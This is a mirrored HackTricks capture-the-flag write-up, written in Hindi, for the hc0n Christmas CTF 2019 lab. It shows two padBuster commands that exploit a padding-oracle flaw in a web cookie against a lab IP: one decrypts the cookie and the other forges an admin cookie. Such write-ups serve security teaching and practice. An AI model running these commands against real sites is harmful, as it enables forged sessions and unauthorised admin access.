Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-16 09:48:14 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md

6.1 KiB
Raw Blame History

hc0n Christmas CTF - 2019

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Enumeration

मैंने मेरे टूल Legion का उपयोग करके मशीन का जाँच करना शुरू किया:

2 खुले पोर्ट हैं: 80 (HTTP) और 22 (SSH)

वेब पेज में आप नए उपयोगकर्ता रजिस्टर कर सकते हैं, और मुझे पता चला कि कुकी की लंबाई उपयोगकर्ता के नाम की लंबाई पर निर्भर है:

और अगर आप कुकी के कुछ बाइट को बदलते हैं तो आपको यह त्रुटि मिलती है:

इस जानकारी के साथ और पैडिंग ऑरेकल वल्नरेबिलिटी को पढ़ने के साथ मैंने इसे एक्सप्लॉइट करने में सक्षम था:

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"

उपयोगकर्ता व्यवस्थापक को सेट करें:

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥